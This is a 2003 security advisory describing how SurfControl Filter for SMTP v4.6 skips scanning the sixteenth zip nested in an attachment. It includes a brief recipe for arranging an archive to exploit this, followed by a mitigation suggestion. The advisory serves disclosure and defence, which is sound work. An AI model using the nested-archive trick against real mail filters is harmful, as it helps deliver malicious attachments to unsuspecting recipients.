|
|
|
|
|
| (c)copyright 2003 networkpenetration.com |
|
|
|
SurfControl Filter for SMTP v4.6 bypass via nested zips ::::::::::::::::::::::::::::::::::::::::::::::::::::::- Discovered By Lee Bowyer Lee@networkpenetration.com (5/Jul/03) SurfControl Filter for SMTP allows for SurfControl's filtering technology to be bolted on to your existing smtp server. The rules engine contains a flaw whereby if an attachment is a .zip and it contains more than 15 zip files, the 16th zip file will not be scanned by the filter. This probably works with other achive/file types and possibly on other SurfControl products. Bypass :::::: In order to bypass the filter build a .zip as below: attach.zip - dummy_folder - a.zip - junk.txt(The filter sorts the files in attach.zip alphabetically so we name our files a,b,c,etc to be sure that z.zip is last) Recommendation :::::::::::::: Tricky, realisticly you can't open all .zips inside .zips - it is very easy to make a very small zip with tens of thousands of zips in, and each of those have many etc. - and if you tried to open such a file you would probably DoS the filter anyhow. SurfControl have chosen a threshold of 15 zips, which while being a little low is understandable, perhaps some sort of 'excessive archiving' filter is the answer. Network Penetration www.networkpenetration.com Copyright (c) 2003 Lee Bowyer Lee@networkpenetration.com - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |